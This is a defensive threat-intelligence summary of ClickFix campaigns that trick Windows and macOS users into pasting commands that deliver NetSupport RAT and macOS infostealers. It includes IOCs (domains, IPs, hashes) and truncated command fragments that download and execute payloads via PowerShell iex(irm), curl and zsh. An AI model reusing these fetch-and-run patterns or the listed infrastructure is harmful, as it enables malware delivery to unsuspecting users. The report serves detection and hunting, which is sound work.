Skip to content
.ca
sign in
6 minhigh

ClickFix Campaigns Targeting Windows and macOS

Insikt Group identified five distinct threat clusters utilizing the ClickFix social engineering technique to trick users into manually executing malicious commands via native system tools. This living-off-the-land approach bypasses traditional browser security to deliver payloads like NetSupport RAT and macOS infostealers across both Windows and macOS environments.

Sens:ImmediateConf:highAnalyzed:2026-03-25reports

Authors: Insikt Group, Recorded Future

ActorsAPT28PurpleBravoClickFixNetSupport RATLumma StealerRedLine StealerMacSyncOdyssey Stealer
NetSupport RATMacSyncSocial EngineeringLOLBinsClickFix

Source:Recorded Future

IOCs · 4
  • domain
    alababababa[.]cloudPayload delivery domain used in Cluster 3 (Birdeye) to distribute various malware strains.
  • domain
    gologpoint[.]comCommand-and-Control (C2) domain for NetSupport RAT delivered in Cluster 1.
  • domain
    nobovcs[.]comStaging domain used in Cluster 1 (Intuit QuickBooks) to host malicious PowerShell scripts and payloads.
  • domain
    octopox[.]comCommand-and-Control (C2) domain for macOS infostealers in Cluster 4.

Key Takeaways

  • The ClickFix methodology uses fake human-verification or system update prompts to trick users into manually executing malicious commands.
  • Five distinct clusters were identified targeting both Windows and macOS, impersonating brands like Intuit QuickBooks, Booking.com, and Birdeye.
  • The attack chain heavily relies on LOLBins (PowerShell, Windows Run dialog, macOS Terminal) to execute payloads in-memory, bypassing traditional browser security.
  • Payloads delivered include NetSupport RAT, Lumma Stealer, RedLine Stealer, MacSync, and Odyssey Stealer.
  • ClickFix has transitioned into a standardized, high-ROI template used by both cybercriminals and APT groups like APT28 (BlueDelta) and PurpleBravo.

Affected Systems

  • Windows
  • macOS

Attack Chain

Victims are lured to a compromised or malicious website presenting a fake human-verification or system update prompt. The site copies an obfuscated command to the victim's clipboard and instructs them to execute it via the Windows Run dialog or macOS Terminal. Once executed, LOLBins like PowerShell or curl download a secondary stager from a remote server. This stager executes in-memory, downloading and launching the final payload (such as NetSupport RAT or MacSync) while establishing persistence via Startup folder shortcuts.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide explicit detection rules but outlines behavioral patterns, command line fragments, and network IOCs for hunting.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions can effectively monitor process creation events, specifically the execution of PowerShell or curl with suspicious arguments, and the creation of files in the Startup folder. Network Visibility: Medium — While C2 traffic can be detected, initial staging often uses HTTPS and Cloudflare, obscuring the payload delivery. However, NetSupport RAT C2 traffic patterns may be identifiable. Detection Difficulty: Moderate — The reliance on user interaction and LOLBins makes initial detection challenging, but the subsequent execution patterns (e.g., iex(irm...) or curl -kfsSL) are well-known and highly detectable.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • PowerShell Script Block Logging (Event ID 4104)
  • File Creation (Sysmon Event ID 11)

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Look for PowerShell executions containing combinations of Invoke-RestMethod (irm) and Invoke-Expression (iex), especially with randomized casing or shortened aliases.Process Creation, PowerShell Script Block LoggingExecutionLow
Monitor for macOS Terminal executions utilizing xxd -r -p piped to base64 and zsh or bash.Process CreationExecutionLow
Detect the creation of .lnk files in the Windows Startup folder by scripts or unusual processes.File CreationPersistenceMedium

Control Gaps

  • Browser security controls (bypassed by manual execution)
  • Static AV signatures (bypassed by in-memory execution and obfuscation)

Key Behavioral Indicators

  • PowerShell command swizzling (e.g., -wINDoW MiNI)
  • macOS commands using nohup and & for background persistence
  • Use of 7z.exe to extract password-protected archives in %TEMP% or %LOCALAPPDATA%

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Block known ClickFix staging and C2 domains/IPs.
  • Hunt for NetSupport RAT and Odyssey Stealer IOCs on endpoints.

Infrastructure Hardening

  • Disable the Windows Run dialog (Win+R) via GPO.
  • Implement PowerShell Constrained Language Mode (CLM).
  • Use AppLocker or WDAC to restrict unassigned scripts.
  • Restrict macOS Terminal via MDM.

User Protection

  • Deploy EDR to monitor for suspicious LOLBin usage.

Security Awareness

  • Train users to recognize fake human-verification prompts and never paste commands into the Run dialog or Terminal.

MITRE ATT&CK Mapping

  • T1566.002 - Phishing: Spearphishing Link
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1204.001 - User Execution: Malicious Link
  • T1027.010 - Obfuscated/Compressed Files or Information: Command Obfuscation
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification
  • T1071.001 - Application Layer Protocol: Web Protocols
  • T1105 - Ingress Tool Transfer

Additional IOCs

  • Ips:
    • 62[.]164[.]177[.]230 - Resolves to gologpoint.com (Cluster 1 NetSupport C2).
    • 91[.]202[.]233[.]206 - IP address hosting multiple ClickFix domains for Cluster 2.
    • 77[.]91[.]65[.]144 - NetSupport RAT C2 IP address for Cluster 2.
    • 77[.]91[.]65[.]31 - NetSupport RAT C2 IP address for Cluster 2.
    • 45[.]135[.]232[.]33 - Staging IP address for Odyssey Stealer C2 (Cluster 4).
    • 217[.]119[.]139[.]117 - Staging IP address for Odyssey Stealer C2 (Cluster 4).
  • Domains:
    • thestayreserve[.]com - ClickFix domain for Cluster 2 (Booking.com).
    • checkpulses[.]com - Staging domain for Cluster 2.
    • sign-in-op-token[.]com - ClickFix domain for Cluster 2.
    • bkng-updt[.]com - Staging domain for Cluster 2.
    • hotelupdatesys[.]com - NetSupport RAT C2 domain for Cluster 2.
    • chrm-srv[.]com - NetSupport RAT C2 domain for Cluster 2.
    • ms-scedg[.]com - NetSupport RAT C2 domain for Cluster 2.
    • joeyapple[.]com - macOS C2 domain for Cluster 4.
    • mac-os-helper[.]com - ClickFix domain for Cluster 5 (macOS Storage Cleaning).
    • macosapp-apple[.]com - ClickFix domain for Cluster 4.
    • quicrob[.]com - Staging domain for Cluster 1.
    • robovcs[.]com - Staging domain for Cluster 1.
  • Urls:
    • hxxps://alababababa[.]cloud/cVGvQio6.txt - Payload download URL for Cluster 3.
  • File Hashes:
    • c0af6e9d848ada3839811bf33eeb982e6c207e4c40010418e0185283cd5cff50 (SHA256) - at.7z archive containing NetSupport RAT binary (Cluster 1).
    • 5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db (SHA256) - lnk.7z archive containing persistence shortcut.
    • 43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87 (SHA256) - 7z.exe utility used for extraction.
    • b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c (SHA256) - 7z.dll utility library.
    • 397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8 (SHA256) - at.7z archive containing NetSupport RAT binary (Cluster 2).
    • 2e9356948f2214fbf12ab3e873e0057fb64764cb8ed9d1c82e7ab0b3eef92a37 (SHA256) - Odyssey Stealer payload hash (Cluster 4).
  • File Paths:
    • %TEMP%\script.ps1 - Location where the initial PowerShell stager is saved.
    • %LOCALAPPDATA%\[Randomized_Romantic_Name] - Directory created by the stager to hide NetSupport RAT artifacts.
  • Command Lines:
    • Purpose: Download and execute remote payload in memory via PowerShell | Tools: powershell.exe | Stage: Execution | powershell.exe -wINDoW MiNI
    • Purpose: Bypass execution policy and download payload via PowerShell | Tools: powershell.exe | Stage: Execution | powershell -wi mi -EP B -c iex(irm
    • Purpose: Download payload silently on macOS bypassing TLS checks | Tools: curl | Stage: Execution | curl -kfsSL
    • Purpose: Decode and execute obfuscated macOS payload | Tools: xxd, base64, zsh | Stage: Execution | xxd -r -p | base64 -D | zsh

Related